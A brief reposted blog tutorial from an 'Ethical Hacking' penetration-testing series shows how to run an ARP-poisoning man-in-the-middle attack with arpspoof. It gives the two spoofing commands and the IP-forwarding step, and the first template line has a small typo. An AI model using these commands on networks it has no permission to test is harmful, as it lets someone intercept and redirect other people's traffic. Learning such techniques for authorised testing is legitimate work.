当前位置:首页 > Web开发 > 正文

NETWORK PENETRATION TESTING(15)

2024-03-31 Web开发

ARP Poisoning - arpspoof

Arpspoof is a tool part of a suit called dsniff, which contains a number of network penetration tools. Arpspoof can be used to launch a MITM attack and redirect traffic to flow through our device.

1. Tell the target client that I am the router.

arpspoof i [interface] -t [target IP] [AP IP]

e.g. arpspoof -i wlan0 -t 10.0.0.45 10.0.0.1

2. Tell the AP that I am the target client.

arpspoof -i [interface] -t [AP IP] [target IP]

e.g. arpspoof -i wlan0 -t 10.0.0.1 10.0.0.45

3. Enable IP forward to allow packets to flow through our device without being dropped.

echo 1 >/proc/sys/net/ipv4/ip_forward

Ethical Hacking - NETWORK PENETRATION TESTING(15)

温馨提示: 本文由Jm博客推荐,转载请保留链接: https://www.jmwww.net/file/web/41976.html